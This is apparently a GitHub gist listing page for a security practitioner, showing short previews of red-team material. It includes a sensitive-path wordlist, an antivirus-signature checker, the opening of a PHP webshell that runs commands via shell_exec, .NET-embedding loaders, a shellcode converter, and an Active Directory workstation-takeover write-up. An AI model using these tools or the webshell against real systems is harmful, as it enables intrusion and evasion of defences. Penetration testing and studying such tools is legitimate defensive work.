I hereby claim:
- I am edermi on github.
- I am edermi (https://keybase.io/edermi) on keybase.
- I have a public key ASCW4hvy-ACn2JOQgRhz__YJFW6Y069muaOF5HF3GWeMEAo
To claim this, I am signing this object:
Michael Eder edermi
edermi
/ keybase.md
Created
March 30, 2017 19:06
edermi
/ snallygaster.txt
Created
April 26, 2018 18:47
snallygaster.txt - a wordlist to use with e.g. gobuster to query the same resources as @hannob's snallygaster
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| lfm.php | |
| .idea/WebServers.xml | |
| config/databases.yml | |
| .git/config | |
| .svn/entries | |
| CVS/Root | |
| server-status | |
| core | |
| sftp-config.json | |
| WS_FTP.ini |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # For untrusted XML input, use a hardened parser, see https://docs.python.org/3/library/xml.html | |
| import xml.etree.ElementTree as ET | |
| import sqlite3 | |
| import argparse | |
| import sys | |
edermi
/ pydefendercheck.py
Created
September 30, 2020 09:45
— forked from daddycocoaman/pydefendercheck.py
PyDefenderCheck
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ################################################## | |
| ## PyDefenderCheck - Python implementation of DefenderCheck | |
| ################################################## | |
| ## Author: daddycocoaman | |
| ## Based on: https://github.com/matterpreter/DefenderCheck | |
| ################################################## | |
| import argparse | |
| import enum |
edermi
/ shell.php
Created
December 8, 2020 22:53
— forked from mrpapercut/shell.php
Interactive PHP webshell
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| function escapetext($text) { | |
| return str_replace("\n", "<br>", htmlentities($text)); | |
| } | |
| function exec_command($cmd, $internal = false) { | |
| try { | |
| $shell_exec = shell_exec($cmd); | |
| } catch (Exception $e) { |
edermi
/ go-sharp-loader.go
Created
April 4, 2021 09:23
— forked from ropnop/go-sharp-loader.go
Example Go file embedding multiple .NET executables
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| /* | |
| Example Go program with multiple .NET Binaries embedded | |
| This requires packr (https://github.com/gobuffalo/packr) and the utility. Install with: | |
| $ go get -u github.com/gobuffalo/packr/packr | |
| Place all your EXEs are in a "binaries" folder |
edermi
/ Workstation-Takeover.md
Created
September 19, 2021 18:52
— forked from gladiatx0r/Workstation-Takeover.md
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure
In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;
- Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
- Relaying that machine authentication to LDAPS for configuring RBCD
- RBCD takeover
The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.
edermi
/ SharpApprover.cs
Created
September 22, 2021 18:25
— forked from dmchell/SharpApprover.cs
Reset the mspki-enrollment-flag attribute when you possess a write ACE on a vulnerable certificate template
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.DirectoryServices; | |
| namespace SharpApprover | |
| { | |
| class Program | |
| { | |
| public static void SetAdInfo(string objectFilter, | |
| int objectValue, string LdapDomain) |
edermi
/ shellcode_to_hex_array.py
Last active
November 12, 2021 12:47
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import sys | |
| def main(): | |
| with open(sys.argv[1], 'rb') as f: | |
| shellcode = f.read() | |
| hexlified = ['0x{:02X}'.format(b) for b in shellcode] | |
| with open(sys.argv[2], 'w') as f: | |
| f.write(','.join(hexlified)) | |
| sys.stderr.write("Shellcode length: {}".format(len(shellcode))) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| server: | |
| # log verbosity | |
| verbosity: 1 | |
| use-syslog: yes | |
| interface: 127.0.0.1 | |
| interface: ::1 | |
| do-ip6: yes |
OlderNewer